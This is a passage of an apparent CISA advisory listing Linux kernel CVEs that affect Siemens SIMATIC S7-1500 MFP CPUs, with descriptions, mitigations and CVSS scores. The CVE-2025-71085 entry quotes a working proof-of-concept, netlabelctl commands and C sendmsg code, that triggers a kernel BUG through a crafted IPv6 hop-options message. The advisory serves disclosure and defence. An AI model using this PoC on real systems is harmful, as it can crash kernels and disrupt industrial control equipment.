<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68816</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net/mlx5: fw_tracer, Validate format string parameters Add validation for format string parameters in the firmware tracer to prevent potential security vulnerabilities and crashes from malformed format strings received from firmware. The firmware tracer receives format strings from the device firmware and uses them to format trace messages. Without proper validation, bad firmware could provide format strings with invalid format specifiers (e.g., %s, %p, %n) that could lead to crashes, or other undefined behavior. Add mlx5_tracer_validate_params() to validate that all format specifiers in trace strings are limited to safe integer/hex formats (%x, %d, %i, %u, %llx, %lx, etc.). Reject strings containing other format types that could be used to access arbitrary memory or cause crashes. Invalid format strings are added to the trace output for visibility with "BAD_FORMAT: " prefix.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68816">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/134.html">CWE-134 Use of Externally-Controlled Format String</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.6</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:P/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H">CVSS:3.1/AV:P/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68818</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: scsi: Revert "scsi: qla2xxx: Perform lockless command completion in abort path" This reverts commit 0367076b0817d5c75dfb83001ce7ce5c64d803a9. The commit being reverted added code to __qla2x00_abort_all_cmds() to call sp-&gt;done() without holding a spinlock. But unlike the older code below it, this new code failed to check sp-&gt;cmd_type and just assumed TYPE_SRB, which results in a jump to an invalid pointer in target-mode with TYPE_TGT_CMD: qla2xxx [0000:65:00.0]-d034:8: qla24xx_do_nack_work create sess success 0000000009f7a79b qla2xxx [0000:65:00.0]-5003:8: ISP System Error - mbx1=1ff5h mbx2=10h mbx3=0h mbx4=0h mbx5=191h mbx6=0h mbx7=0h. qla2xxx [0000:65:00.0]-d01e:8: -&gt; fwdump no buffer qla2xxx [0000:65:00.0]-f03a:8: qla_target(0): System error async event 0x8002 occurred qla2xxx [0000:65:00.0]-00af:8: Performing ISP error recovery - ha=0000000058183fda. BUG: kernel NULL pointer dereference, address: 0000000000000000 PF: supervisor instruction fetch in kernel mode PF: error_code(0x0010) - not-present page PGD 0 P4D 0 Oops: 0010 [#1] SMP CPU: 2 PID: 9446 Comm: qla2xxx_8_dpc Tainted: G O 6.1.133 #1 Hardware name: Supermicro Super Server/X11SPL-F, BIOS 4.2 12/15/2023 RIP: 0010:0x0 Code: Unable to access opcode bytes at 0xffffffffffffffd6. RSP: 0018:ffffc90001f93dc8 EFLAGS: 00010206 RAX: 0000000000000282 RBX: 0000000000000355 RCX: ffff88810d16a000 RDX: ffff88810dbadaa8 RSI: 0000000000080000 RDI: ffff888169dc38c0 RBP: ffff888169dc38c0 R08: 0000000000000001 R09: 0000000000000045 R10: ffffffffa034bdf0 R11: 0000000000000000 R12: ffff88810800bb40 R13: 0000000000001aa8 R14: ffff888100136610 R15: ffff8881070f7400 FS: 0000000000000000(0000) GS:ffff88bf80080000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: ffffffffffffffd6 CR3: 000000010c8ff006 CR4: 00000000003706e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: ? __die+0x4d/0x8b ? page_fault_oops+0x91/0x180 ? trace_buffer_unlock_commit_regs+0x38/0x1a0 ? exc_page_fault+0x391/0x5e0 ? asm_exc_page_fault+0x22/0x30 __qla2x00_abort_all_cmds+0xcb/0x3e0 [qla2xxx_scst] qla2x00_abort_all_cmds+0x50/0x70 [qla2xxx_scst] qla2x00_abort_isp_cleanup+0x3b7/0x4b0 [qla2xxx_scst] qla2x00_abort_isp+0xfd/0x860 [qla2xxx_scst] qla2x00_do_dpc+0x581/0xa40 [qla2xxx_scst] kthread+0xa8/0xd0 Then commit 4475afa2646d ("scsi: qla2xxx: Complete command early within lock") added the spinlock back, because not having the lock caused a race and a crash. But qla2x00_abort_srb() in the switch below already checks for qla2x00_chip_is_down() and handles it the same way, so the code above the switch is now redundant and still buggy in target-mode. Remove it.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68818">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68820</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ext4: xattr: fix null pointer deref in ext4_raw_inode() If ext4_get_inode_loc() fails (e.g. if it returns -EFSCORRUPTED), iloc.bh will remain set to NULL. Since ext4_xattr_inode_dec_ref_all() lacks error checking, this will lead to a null pointer dereference in ext4_raw_inode(), called right after ext4_get_inode_loc(). Found by Linux Verification Center (linuxtesting.org) with SVACE.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68820">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/252.html">CWE-252 Unchecked Return Value</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71064</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: hns3: using the num_tqps in the vf driver to apply for resources Currently, hdev-&gt;htqp is allocated using hdev-&gt;num_tqps, and kinfo-&gt;tqp is allocated using kinfo-&gt;num_tqps. However, kinfo-&gt;num_tqps is set to min(new_tqps, hdev-&gt;num_tqps); Therefore, kinfo-&gt;num_tqps may be smaller than hdev-&gt;num_tqps, which causes some hdev-&gt;htqp[i] to remain uninitialized in hclgevf_knic_setup(). Thus, this patch allocates hdev-&gt;htqp and kinfo-&gt;tqp using hdev-&gt;num_tqps, ensuring that the lengths of hdev-&gt;htqp and kinfo-&gt;tqp are consistent and that all elements are properly initialized.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71064">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/909.html">CWE-909 Missing Initialization of Resource</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71075</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: scsi: aic94xx: fix use-after-free in device removal path The asd_pci_remove() function fails to synchronize with pending tasklets before freeing the asd_ha structure, leading to a potential use-after-free vulnerability. When a device removal is triggered (via hot-unplug or module unload), race condition can occur. The fix adds tasklet_kill() before freeing the asd_ha structure, ensuring all scheduled tasklets complete before cleanup proceeds.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71075">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/364.html">CWE-364 Signal Handler Race Condition</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71079</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: nfc: fix deadlock between nfc_unregister_device and rfkill_fop_write A deadlock can occur between nfc_unregister_device() and rfkill_fop_write() due to lock ordering inversion between device_lock and rfkill_global_mutex. The problematic lock order is: Thread A (rfkill_fop_write): rfkill_fop_write() mutex_lock(&amp;rfkill_global_mutex) rfkill_set_block() nfc_rfkill_set_block() nfc_dev_down() device_lock(&amp;dev-&gt;dev) &lt;- waits for device_lock Thread B (nfc_unregister_device): nfc_unregister_device() device_lock(&amp;dev-&gt;dev) rfkill_unregister() mutex_lock(&amp;rfkill_global_mutex) &lt;- waits for rfkill_global_mutex This creates a classic ABBA deadlock scenario. Fix this by moving rfkill_unregister() and rfkill_destroy() outside the device_lock critical section. Store the rfkill pointer in a local variable before releasing the lock, then call rfkill_unregister() after releasing device_lock. This change is safe because rfkill_fop_write() holds rfkill_global_mutex while calling the rfkill callbacks, and rfkill_unregister() also acquires rfkill_global_mutex before cleanup. Therefore, rfkill_unregister() will wait for any ongoing callback to complete before proceeding, and device_del() is only called after rfkill_unregister() returns, preventing any use-after-free. The similar lock ordering in nfc_register_device() (device_lock -&gt; rfkill_global_mutex via rfkill_register) is safe because during registration the device is not yet in rfkill_list, so no concurrent rfkill operations can occur on this device.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71079">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71085</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() There exists a kernel oops caused by a BUG_ON(nhead &lt; 0) at net/core/skbuff.c:2232 in pskb_expand_head(). This bug is triggered as part of the calipso_skbuff_setattr() routine when skb_cow() is passed headroom &gt; INT_MAX (i.e. (int)(skb_headroom(skb) + len_delta) &lt; 0). The root cause of the bug is due to an implicit integer cast in __skb_cow(). The check (headroom &gt; skb_headroom(skb)) is meant to ensure that delta = headroom - skb_headroom(skb) is never negative, otherwise we will trigger a BUG_ON in pskb_expand_head(). However, if headroom &gt; INT_MAX and delta &lt;= -NET_SKB_PAD, the check passes, delta becomes negative, and pskb_expand_head() is passed a negative value for nhead. Fix the trigger condition in calipso_skbuff_setattr(). Avoid passing "negative" headroom sizes to skb_cow() within calipso_skbuff_setattr() by only using skb_cow() to grow headroom. PoC: Using `netlabelctl` tool: netlabelctl map del default netlabelctl calipso add pass doi:7 netlabelctl map add default address:0::1/128 protocol:calipso,7 Then run the following PoC: int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP); // setup msghdr int cmsg_size = 2; int cmsg_len = 0x60; struct msghdr msg; struct sockaddr_in6 dest_addr; struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1, sizeof(struct cmsghdr) + cmsg_len); msg.msg_name = &amp;dest_addr; msg.msg_namelen = sizeof(dest_addr); msg.msg_iov = NULL; msg.msg_iovlen = 0; msg.msg_control = cmsg; msg.msg_controllen = cmsg_len; msg.msg_flags = 0; // setup sockaddr dest_addr.sin6_family = AF_INET6; dest_addr.sin6_port = htons(31337); dest_addr.sin6_flowinfo = htonl(31337); dest_addr.sin6_addr = in6addr_loopback; dest_addr.sin6_scope_id = 31337; // setup cmsghdr cmsg-&gt;cmsg_len = cmsg_len; cmsg-&gt;cmsg_level = IPPROTO_IPV6; cmsg-&gt;cmsg_type = IPV6_HOPOPTS; char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr); hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80 sendmsg(fd, &amp;msg, 0);</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71085">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71086</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: rose: fix invalid array index in rose_kill_by_device() rose_kill_by_device() collects sockets into a local array[] and then iterates over them to disconnect sockets bound to a device being brought down. The loop mistakenly indexes array[cnt] instead of array[i]. For cnt &lt; ARRAY_SIZE(array), this reads an uninitialized entry; for cnt == ARRAY_SIZE(array), it is an out-of-bounds read. Either case can lead to an invalid socket pointer dereference and also leaks references taken via sock_hold(). Fix the index to use i.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71086">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
